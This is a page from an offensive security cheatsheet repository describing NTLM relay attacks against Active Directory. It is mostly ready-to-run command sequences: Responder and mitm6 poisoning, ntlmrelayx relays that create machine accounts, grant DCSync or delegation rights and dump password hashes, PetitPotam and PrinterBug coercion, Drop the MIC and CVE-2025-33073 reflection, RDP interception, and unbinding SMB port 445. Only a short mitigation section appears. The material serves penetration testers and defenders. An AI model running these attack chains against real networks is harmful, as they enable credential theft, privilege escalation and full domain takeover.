daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

internal-relay-ntlm.md (20658B)


      1 ---
      2 title: "Internal - NTLM Relay"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/internal-relay-ntlm.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-relay-ntlm.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Internal - NTLM Relay
     12 
     13 NTLMv1 and NTLMv2 can be relayed to connect to another machine.
     14 
     15 | Hash                  | Hashcat | Attack method        |
     16 |-----------------------|---------|----------------------|
     17 | LM                    | `3000`  | crack/pass the hash  |
     18 | NTLM/NTHash           | `1000`  | crack/pass the hash  |
     19 | NTLMv1/Net-NTLMv1     | `5500`  | crack/relay attack   |
     20 | NTLMv2/Net-NTLMv2     | `5600`  | crack/relay attack   |
     21 
     22 Crack the hash with `hashcat`.
     23 
     24 ```powershell
     25 hashcat -m 5600 -a 0 hash.txt crackstation.txt
     26 ```
     27 
     28 ## MS08-068 NTLM reflection
     29 
     30 NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
     31 
     32 > This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.
     33 
     34 * <https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068>
     35 
     36 ```powershell
     37 msf > use exploit/windows/smb/smb_relay
     38 msf exploit(smb_relay) > show targets
     39 ```
     40 
     41 ## LDAP signing not required and LDAP channel binding disabled
     42 
     43 During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
     44 
     45 * LDAP signing not required (by default set to `Not required`)
     46 * LDAP channel binding is disabled. (by default disabled)
     47 * `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
     48 
     49 Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
     50 
     51 ```bash
     52 # On first terminal
     53 sudo ./Responder.py -I eth0 -wfrd -P -v
     54 
     55 # On second terminal
     56 sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer
     57 ```
     58 
     59 It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection.
     60 
     61 ## SMB Signing Disabled and IPv4
     62 
     63 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**
     64 
     65 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
     66 
     67     ```powershell
     68     [Responder Core]
     69     ; Servers to start
     70     ...
     71     SMB = Off     # Turn this off
     72     HTTP = Off    # Turn this off
     73     ```
     74 
     75 2. Run `python  RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
     76 3. Run `python Responder.py -I <interface_card>`
     77 4. Use a relay tool such as `ntlmrelayx` or `MultiRelay`
     78     * `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list.
     79     * `python MultiRelay.py -t <target_machine_IP> -u ALL`
     80 5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
     81 
     82     ```powershell
     83     $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support
     84     [*] Servers started, waiting for connections
     85     Type help for list of commands
     86     ntlmrelayx> socks
     87     Protocol  Target          Username                  Port
     88     --------  --------------  ------------------------  ----
     89     MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
     90     SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
     91     MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
     92 
     93     # You might need to select a target with "-t"
     94     # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp://
     95     impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
     96     impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
     97 
     98     # the socks proxy can then be used with your Impacket tools or netexec
     99     $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
    100     $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth
    101     $ proxychains netexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"   
    102     ```
    103 
    104 **Mitigations**:
    105 
    106 * Disable LLMNR via group policy
    107 
    108     ```powershell
    109     Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
    110     ```
    111 
    112 * Disable NBT-NS
    113 
    114     ```powershell
    115     This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
    116     ```
    117 
    118 ## SMB Signing Disabled and IPv6
    119 
    120 Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
    121 
    122 ```powershell
    123 netexec smb $hosts --gen-relay-list relay.txt
    124 
    125 # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
    126 # -d is the domain name that we filter our request on - the attacked domain
    127 # -i is the interface we have mitm6 listen on for events
    128 mitm6 -i eth0 -d $domain
    129 
    130 # spoofing WPAD and relaying NTLM credentials
    131 impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt
    132 impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug
    133 
    134 # -ip is the interface you want the relay to run on
    135 # -wh is for WPAD host, specifying your wpad file to serve
    136 # -t is the target where you want to relay to. 
    137 impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
    138 ```
    139 
    140 ## Drop the MIC - CVE-2019-1040
    141 
    142 > The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
    143 
    144 Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
    145 
    146 ```powershell
    147 python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
    148 [*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
    149 [*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
    150 ```
    151 
    152 * Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
    153 
    154     ```powershell
    155     TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local <attacker ip/hostname>
    156     TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
    157     TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
    158     ```
    159 
    160 * Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
    161 
    162     ```powershell
    163     # create a new machine account
    164     TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support 
    165     TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6
    166     TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME
    167 
    168     # connect using the ticket
    169     export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
    170     secretsdump.py -k -no-pass second-dc-server.local -just-dc
    171     ```
    172 
    173 ## Drop the MIC 2 - CVE-2019-1166
    174 
    175 > A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature.
    176 
    177 * Unset the signing flags in the `NTLM_NEGOTIATE` message (`NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`)
    178 * Inject a rogue msvAvFlag field in the `NTLM_CHALLENGE` message with a value of zeros
    179 * Remove the MIC from the `NTLM_AUTHENTICATE` message
    180 * Unset the following flags in the `NTLM_AUTHENTICATE` message: `NTLMSSP_NEGOTIATE_ALWAYS_SIGN`, `NTLMSSP_NEGOTIATE_SIGN`, `NEGOTIATE_KEY_EXCHANGE`, `NEGOTIATE_VERSION`.
    181 
    182 ```ps1
    183 ntlmrelayx.py -t ldap://dc.domain.com --escalate-user 'youruser$' -smb2support --remove-mic --delegate-access
    184 ```
    185 
    186 ## Ghost Potato - CVE-2019-1384
    187 
    188 Requirements:
    189 
    190 * User must be a member of the local Administrators group
    191 * User must be a member of the Backup Operators group
    192 * Token must be elevated
    193 
    194 Using a modified version of ntlmrelayx : <https://shenaniganslabs.io/files/impacket-ghostpotato.zip>
    195 
    196 ```powershell
    197 ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
    198 ```
    199 
    200 ## RemotePotato0 DCOM DCE RPC relay
    201 
    202 > It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
    203 
    204 Requirements:
    205 
    206 * a shell in session 0 (e.g. WinRm shell or SSH shell)
    207 * a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
    208 
    209 ```powershell
    210 # https://github.com/antonioCoco/RemotePotato0/
    211 Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016
    212 Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1
    213 Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2
    214 Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
    215 ```
    216 
    217 ## DNS Poisonning - Relay delegation with mitm6
    218 
    219 Requirements:
    220 
    221 * IPv6 enabled (Windows prefers IPV6 over IPv4)
    222 * LDAP over TLS (LDAPS)
    223 
    224 > ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it.
    225 
    226 ```powershell
    227 git clone https://github.com/fox-it/mitm6.git 
    228 cd /opt/tools/mitm6
    229 pip install .
    230 
    231 mitm6 -hw ws02 -d lab.local --ignore-nofqnd
    232 # -d: the domain name that we filter our request on (the attacked domain)
    233 # -i: the interface we have mitm6 listen on for events
    234 # -hw: host whitelist
    235 
    236 ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad
    237 ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer
    238 # -ip: the interface you want the relay to run on
    239 # -wh: WPAD host, specifying your wpad file to serve
    240 # -t: the target where you want to relay to
    241 
    242 # now granting delegation rights and then do a RBCD
    243 ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
    244 getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator  
    245 export KRB5CCNAME=administrator.ccache  
    246 secretsdump.py -k -no-pass target.lab.local  
    247 ```
    248 
    249 ## NTLM Reflection - CVE-2025-33073
    250 
    251 * Add a DNS record for `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` pointing to our IP address. It is also possible to compromise any vulnerable machine by registering `localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA`.
    252 
    253     ```ps1
    254     dnstool.py -u 'domain.local\username' -p 'P@ssw0rd' 10.10.10.10 -a add -r target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 198.51.100.27
    255     # OR
    256     pretender -i "vmnet2" --spoof "target1UWhR..." --no-dhcp --no-timestamps
    257     ```
    258 
    259 * Start the relay to catch the callback from TARGET.
    260 
    261     ```ps1
    262     ntlmrelayx.py -t smb://TARGET.domain.local -smb2support
    263     ntlmrelayx.py -t smb://TARGET.domain.local -smb2support -c 'type C:\Users\Administrator\Desktop\flag.txt'
    264     ```
    265 
    266 * Trigger a callback from the server to `[SERVERNAME] + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` using PetitPotam.
    267 
    268     ```ps1
    269     nxc smb TARGET.domain.local -u username -p 'P@ssw0rd' -M coerce_plus -o M=Petitpotam LISTENER=target1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
    270     # OR
    271     petitpotam.py -d domain.local -u username -p 'password' "TARGET1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" "TARGET.DOMAIN.LOCAL"
    272     ```
    273 
    274 ## Relaying with WebDav Trick
    275 
    276 > Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
    277 
    278 **Requirement**:
    279 
    280 * WebClient service
    281 
    282 **Exploitation**:
    283 
    284 * Discover machines on the network with enabled WebClient service
    285 
    286     ```ps1
    287     webclientservicescanner 'domain.local'/'user':'password'@'machine'
    288     netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav
    289     GetWebDAVStatus.exe 'machine'
    290     ```
    291 
    292 * Disable HTTP in Responder
    293 
    294     ```ps1
    295     sudo vi /usr/share/responder/Responder.conf
    296     ```
    297 
    298 * Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0"
    299 
    300     ```ps1
    301     sudo responder -I eth0
    302     ```
    303 
    304 * Prepare for RBCD against the DC
    305 
    306     ```ps1
    307     python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
    308     ```
    309 
    310 * Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
    311 
    312   ```ps1
    313   # PrinterBug
    314   dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
    315   SpoolSample.exe "TARGET_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt"
    316 
    317   # PetitPotam
    318   Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
    319   Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
    320   PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
    321   ```
    322 
    323 * Use the created account to ask for a service ticket:
    324 
    325     ```ps1
    326     .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
    327     .\Rubeus.exe s4u /user:WVLFLLKZ$ /aes256:E0B3D87B512C218D38FAFDBD8A2EC55C83044FD24B6D740140C329F248992D8F /impersonateuser:Administrator /msdsspn:host/pc1.purple.lab /altservice:cifs /nowrap /ptt
    328     ls \\PC1.purple.lab\c$
    329     # IP of PC1: 10.0.0.4
    330     ```
    331 
    332 An alternative for the previous exploitation method is to register a **DNS entry** for the attack machine by yourself then trigger the coercion.
    333 
    334 ```ps1
    335 python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2
    336 python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3
    337 ```
    338 
    339 ## Man-in-the-middle RDP connections with pyrdp-mitm
    340 
    341 * [GoSecure/pyrdp](https://github.com/GoSecure/pyrdp)
    342 * [RDP Man-in-the-Middle – Smile! You’re on Camera](https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera)
    343 
    344 **Usage**
    345 
    346 ```sh
    347 pyrdp-mitm.py <IP>
    348 pyrdp-mitp.py <IP>:<PORT> # with custom port
    349 pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
    350 ```
    351 
    352 **Exploitation**
    353 
    354 * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
    355 * If NLA is disabled, you will obtain the password in plaintext
    356 * Other features are available such as keystroke recording
    357 
    358 **Alternatives**
    359 
    360 * [SySS-Research/Seth](https://github.com/SySS-Research/Seth), performs ARP spoofing prior to launching the RDP listener
    361 
    362 ## Relay IIS AppPool to Local Administrator
    363 
    364 * HTTP coerce from the targeted machine
    365 
    366     ```ps1
    367     powershell iwr http://10.10.10.2 -UseDefaultCredentials 
    368     ```
    369 
    370 * Relay to LDAP
    371 
    372     ```ps1
    373     ntlmrelayx -t ldap://10.10.10.1 -smb2support --interactive
    374     ```
    375 
    376 * Connect to the interactive LDAP shell via TCP
    377 
    378     ```ps1
    379     nc 127.0.0.1 <PORT>
    380     ```
    381 
    382 * Enable TLS and setup RBCD
    383 
    384     ```ps1
    385     start_tls
    386     add_computer fakePC P@ssword123
    387     set_rbcd TARGET$ fakePC$
    388     ```
    389 
    390 * Impersonate the administrator
    391 
    392     ```ps1
    393     getST.py -spn 'cifs/target.lab.local' -impersonate Administrator -dc-ip 'dc.lab.local' 'lab.local/fakePC$:P@ssword123'
    394     export KRB5CCNAME=/tmp/Administrator@cifs_target.lab.local@LAB.LOCAL.ccache
    395     wmiexec.py -k -no-pass @target.lab.local
    396     ```
    397 
    398 ## Common Issues Forwarding Port 445
    399 
    400 By default the SMB service is listening on port 445, blocking any relaying attempt on this port
    401 
    402 **Technique #1**: Forward port 445 on Windows machine using a driver
    403 
    404 * [praetorian-inc/PortBender](https://github.com/praetorian-inc/PortBender) - TCP Port Redirection Utility
    405 
    406     ```ps1
    407     rportfwd 8445 127.0.0.1 445 # Machine 8445 redirected to Teamserver 445
    408     sudo proxychains python3 examples/ntlmrelayx.py -t smb://10.10.10.10 -smb2support # relay SMB to 10.10.10.10
    409 
    410     upload WinDivert32.sys
    411     upload WinDivert64.sys
    412 
    413     PortBender redirect 445 8445 # Redirect port 445 to 8445 on the machine
    414     ```
    415 
    416 **Technique #2**: Disable SMB service, to easily portforward port 445
    417 
    418 * [zyn3rgy/smbtakeover](https://github.com/zyn3rgy/smbtakeover) - BOF and Python3 implementation of technique to unbind 445/tcp on Windows via SCM interactions
    419 
    420     ```ps1
    421     python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 check
    422     python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 stop
    423     python3 smbtakeover.py atlas.lab/josh:password1@10.0.0.21 start
    424 
    425     bof_smbtakeover localhost check
    426     bof_smbtakeover 10.0.0.21 stop
    427     bof_smbtakeover localhost start
    428 
    429     rportfwd_local 445 127.0.0.1 445
    430     ```
    431 
    432 * [Windows/sc.exe](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/sc-config)
    433 
    434     ```ps1
    435     sc config LanmanServer start= disabled
    436     sc stop LanmanServer
    437     sc stop srv2
    438     sc stop srvnet
    439     ```
    440 
    441 * [XiaoliChan/wmiexec-Pro](https://github.com/XiaoliChan/wmiexec-Pro)
    442 
    443     ```ps1
    444     wmiexec-pro.py lab.local/admin@target.lab.local service -action disable -service-name "LanmanServer"
    445     wmiexec-pro.py lab.local/admin@target.lab.local service -action stop -service-name "LanmanServer"
    446     wmiexec-pro.py lab.local/admin@target.lab.local service -action stop -service-name "srv2"
    447     wmiexec-pro.py lab.local/admin@target.lab.local service -action disable -service-name "srvnet"
    448     wmiexec-pro.py lab.local/admin@target.lab.local service -action getinfo -service-name "srvnet"
    449     ```
    450 
    451 ## References
    452 
    453 * [Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx - Quentin Roland - January 27, 2025](https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with)
    454 * [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
    455 * [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema - June 13, 2019](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
    456 * [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/)
    457 * [NTLM reflection is dead, long live NTLM reflection! – An in-depth analysis of CVE-2025-33073 - Wilfried Bécard and Guillaume André - June 11, 2025](https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025)
    458 * [NTLM Relaying to LDAP - The Hail Mary of Network Compromise - @logangoins - July 23, 2024](https://logan-goins.com/2024-07-23-ldap-relay/)
    459 * [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
    460 * [Relay Your Heart Away - An OPSEC-Conscious Approach to 445 Takeover - Nick Powers (@zyn3rgy) - Aug 1, 2024](https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac)
    461 * [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers (@zyn3rgy) - July 27, 2024](https://www.youtube.com/watch?v=iBqOOkQGJEA)
    462 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)